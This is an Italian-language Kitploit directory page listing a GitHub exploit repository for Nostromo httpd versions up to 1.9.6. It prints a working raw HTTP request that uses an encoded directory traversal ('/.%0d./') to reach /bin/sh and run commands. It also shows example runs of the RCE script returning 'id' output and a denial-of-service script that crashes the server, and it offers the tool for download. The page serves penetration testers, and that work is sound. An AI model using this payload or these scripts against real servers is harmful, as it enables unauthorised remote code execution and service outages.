Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-16278 — Da directory traversal a esecuzione remota di codice | Kitploit
Strumenti/GitHubGitHub/jas502n/cve-2019-16278
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebStrumento di Accesso Remoto
GitHubjas502n/cve-2019-16278

CVE-2019-16278

Da directory traversal a esecuzione remota di codice

Vedi Repository
70276 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per CVE-2019-16278 e CVE-2019-16279

Nostromo httpd è soggetto a 2 vulnerabilità critiche per versioni <= 1.9.6 (0day =]) la prima è un RCE tramite directory traversal, la seconda è un DoS

CVE-2019-16278 - Directory traversal per esecuzione di codice in remoto

root@kitploit:~
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25

echo
echo
ifconfig 2>&1

Questo bug è dovuto a una correzione incompleta per CVE-2011-0751. Possiamo aggirare un controllo per /../ che ci permette di eseguire /bin/sh con argomenti arbitrari.

Esempio

root@kitploit:~
$ ./CVE-2019-16278.sh 127.0.0.1 8080 id
uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)

CVE-2019-16279 - Denial of Service

Questo bug sfrutta un errore di memoria quando si inviano troppi \r\n in una singola connessione.

Esempio

root@kitploit:~
$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

Link di riferimento:

https://git.sp0re.sh/sp0re/Nhttpd-exploits

Scarica lo strumento